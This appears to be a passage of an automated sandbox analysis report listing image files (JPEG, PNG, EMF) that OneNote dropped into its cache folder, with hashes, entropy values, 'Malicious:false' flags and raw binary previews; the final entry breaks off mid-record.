                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):34299
                                                                                                                                            Entropy (8bit):7.247541176493898
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:BrSX4V3P8AIc4KLkHeXRUer0zrhOmXfvG0yH82I:tSXuIc4K2eBtswKsHg
                                                                                                                                            MD5:E9C52A7381075E4EBC59296F96C79399
                                                                                                                                            SHA1:BE295AD24D46E2420D7163642B658BF3234A27EA
                                                                                                                                            SHA-256:D56CEFE9EE2FAE72E31BDBA7DD2AA4426EA22E3CEB22EF68C8F63F9F24D5A8BC
                                                                                                                                            SHA-512:95CC96DD4459EBAE623176033BA204CCDC50681A768F8CBAE94C16927D140224E49D5197CAE669C83C77010C5C04C1346CF126BEF49DB686F636C5480342A77F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.......................................................................................!.1..A..Qaq......".#4.2r3.$.%...B.5U&6....Rb.Cs.7..cDTEFVf'...S..dtevw.u.........Gg.....................!1..AQ.aq.2....."#3.4....r..BRb$CS.D............?..5..............#....v.q.m.}\..{....;...r....h.....J..q|..'.;\..6..v......e...../.k..|.8..i..|..]..3e.m....n..Z.GS..n".y..w.-...[a...7A.....i.4.)9\..~C...=.........s..\V]c.D1<./.g.l.&v..~.h..]....zb>G..y:vNS.\......LU....t.{*..Z#.?..v-...wn.rR...P.....y\=.v....../..9_...m4...V.|.+.o.#.......xj....}..>.s.>C...m.[;.>.p...=^.i.X.(..1...{.F#N.W...xi.z...4..u[{...yO.....8..}\..2...KlX.nbya...2.&.F...R.b.k.7.GV.x.h.y\.Q..O<\>......-...=...r......\......Z.Z...Jf.'....z..Y.q>.p....o..K....h..R..c.lg?......A.Z...Y.q3.L|.'5...

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009T.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 171 x 552, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10056
                                                                                                                                            Entropy (8bit):7.956064700093514
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:edmu1fpj5DVHuooK4EpGLbAdT+dBXYBR8D1V2p6KwoPR6KUX9ojwRpgA:2Pp/B4LbAF+dBo/1E3S6JScpgA
                                                                                                                                            MD5:E1B57A8851177DD25DC05B50B904656A
                                                                                                                                            SHA1:96D2E31A325322F2720722973814D2CAED23D546
                                                                                                                                            SHA-256:2035407A0540E1C4F7934DB08BA4ADD750FCB9A62863DDD9553E7871C81A99E3
                                                                                                                                            SHA-512:BC7DC1201884E6DAFDC1F9D8E32656BFAEE0BB4905835E09B65299FE2D7C064B27EAA10B531F9BECF970C986E89A5FD8A0B83F508BBA34EB4E38B3F7F5FC623A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......(.....!..t....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................4.....bKGD....H....cmPPJCmp0712....H.s...#.IDATx^.w`......$..B....... ....fz5..6`l\.8...Nsz{.//y./....{.7}g.....e.....~.......s...f.....%c...6....O.PJ...Y.oi...9..'j.2..6.-

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009V.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:11:38], progressive, precision 8, 577x757, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):84097
                                                                                                                                            Entropy (8bit):7.78862495530604
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:cgHTEuD99rHwA5MSadIV2MApVmfJkAKOQ/Z1I7ngpDDyHfKFVITrU:HHjXidIhApV88/jIEmrU
                                                                                                                                            MD5:37EED97290E8ECB46A576C84F0810568
                                                                                                                                            SHA1:18D9FACB4CFA3CBF63B882CABCF30B203EDF4126
                                                                                                                                            SHA-256:140DD943D0F0CFE6AAA98470B7D1A7CB62CA02CB1D8F522DD2AC77433232EF41
                                                                                                                                            SHA-512:E0F57314C136211B8253EB2AC0093DED82198E7170D4F97C40D82FD4EC4123D2AAFE3EB4EBC3E7523C4DF4D77619408773871BDE15B6DC6C4049C71D5B9D4222
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H.....hExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:11:38.............................A.......................................................&.(.................................2.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................z.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....b.xH......T..I...S.q.~..../s.R.x.....8.a..vE.5...-.G.A.4...._......$K..d.@NC.q....J.....>e".I.%...I0).R.I$........M3.F .

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000A1.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:26:15], progressive, precision 8, 216x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):64118
                                                                                                                                            Entropy (8bit):7.742974333356952
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:ORG4azGOKXzkEmR4bdRSbxONOoz0khbSb4J/5GZK5SWUlRwUYdv1M:ZXzGXzJdhRmgHfIb4J/5GZK5SWUldYdq
                                                                                                                                            MD5:864EEA0336F8628AE4A1ED46D4406807
                                                                                                                                            SHA1:CFCD7A751DFDBE52A20C03EE0C60FDFFA7A45B93
                                                                                                                                            SHA-256:7CE10D1EA660D2F9CF8B704F3FAB2966A4CE2627D9858D32C75D857095012098
                                                                                                                                            SHA-512:0CAA0C54C14571C279A75F0D5922F78A17803CF6EE1724D66819F7F5944C0F5B25CB586BB686A52808CDF2F8FEB3E4864052A914884054EF7DE44124A8CA951E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:26:15.....................................................................................(.....................&...........s.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................#.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....NC+n....<.=.7..&.8A56..@^.Q..\\...E.>..".&G.......J .'....$.I)........0.../..mv...D....<v0=..ugc+..l.o...=.c.......x.&D..{`8...v

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000A3.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:09:29], progressive, precision 8, 609x675, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):65998
                                                                                                                                            Entropy (8bit):7.671031449942883
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:klZtmExaFrtWgpc+Sg+DKeplHClpHfRtPMbe:VEWWl+SNDKqlH8p/vse
                                                                                                                                            MD5:B4F0A040890EE6F61EF8D9E094893C9C
                                                                                                                                            SHA1:303BCBA1D777B03BFD99CC01A48E0BB493C93E04
                                                                                                                                            SHA-256:1F81DDE3B42F23F0666D92EBF14D62893B31B39D72C07AEE070EAE28C2E6980E
                                                                                                                                            SHA-512:8F07E4D519F2FD001006BB34F7F8274B9AF9EC55367B88D41D24E5824FCE4354FD1290CE4735E43930829702ED53F41DF02C673904A7091E9354C28E029AD4EF
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:09:29.............................a.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..-O..s(...gO..@...[..+....+...H.'m........L.......@.......[k...S..O..p.'{X..3......]W..w.+.V....[.-.....2..i..i$.p.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000A5.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):32656
                                                                                                                                            Entropy (8bit):3.9517299510231485
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                                                            MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                                                            SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                                                            SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                                                            SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000A6.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12824
                                                                                                                                            Entropy (8bit):7.974776104184905
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                                                            MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                                                            SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                                                            SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                                                            SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000A7.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):32656
                                                                                                                                            Entropy (8bit):3.9517299510231485
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                                                            MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                                                            SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                                                            SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                                                            SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000A8.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12824
                                                                                                                                            Entropy (8bit):7.974776104184905
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                                                            MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                                                            SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                                                            SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                                                            SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000A9.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):32656
                                                                                                                                            Entropy (8bit):3.9517299510231485
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                                                            MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                                                            SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                                                            SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                                                            SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AA.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12824
                                                                                                                                            Entropy (8bit):7.974776104184905
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                                                            MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                                                            SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                                                            SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                                                            SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AC.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):39010
                                                                                                                                            Entropy (8bit):7.362726513389497
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
                                                                                                                                            MD5:9700DE02720CDB5A45EDE51F1A4647EC
                                                                                                                                            SHA1:CF72A73E1181719B1CC45C2FE0A6B619081E115E
                                                                                                                                            SHA-256:7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
                                                                                                                                            SHA-512:5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......|]v....D..9.k.w.|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AE.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):25622
                                                                                                                                            Entropy (8bit):7.058784902089801
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
                                                                                                                                            MD5:F8CCFC24DEB1D991EBE085E1B2D7D9BF
                                                                                                                                            SHA1:AF76C22A765434AEDA134924C517C84107F4FED5
                                                                                                                                            SHA-256:7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
                                                                                                                                            SHA-512:818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q*.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..|..n.....6.*...f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf..*....z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.)*.e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AG.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 50 x 500, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2033
                                                                                                                                            Entropy (8bit):6.8741208714657
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:P37XYSDTz+UUl7DHt7Ah8l1+4ZfFclFUXwobKXlZr:v7j3z+UoDN0h8ugf2AwobMN
                                                                                                                                            MD5:CA7D2BECCBC3741D73453DCF21D846E0
                                                                                                                                            SHA1:E34B7788498E33FFF0CFB00125E6BA9E090F6CED
                                                                                                                                            SHA-256:E9EAD0BFC09D32CB366010CDFEDE1C432A2D1D550CB7332BADAC1BEE9482BC86
                                                                                                                                            SHA-512:7FE2C3654262B1EEBED4F6D83DA7D3450E1BE52500A3964185FC0092041506A237A2728E5D7EEA0A3814E413E822B803B789C49CF744D51816A2E4EDE5B4247B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...2.........H'......PLTE........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................[....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.\.W.G...=a.ewA..a.!r( ...%Dc..x.x....N.OO...3=...S...........~.z.D.0...g.2P.7.*M.#'....z.......3TPj.Z.[5....V..z'L3...a.j9..C>..9.z

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AI.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):55804
                                                                                                                                            Entropy (8bit):7.433623355028275
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
                                                                                                                                            MD5:4126992F65FE53D3E3E78F6B27FD49DC
                                                                                                                                            SHA1:BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
                                                                                                                                            SHA-256:3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
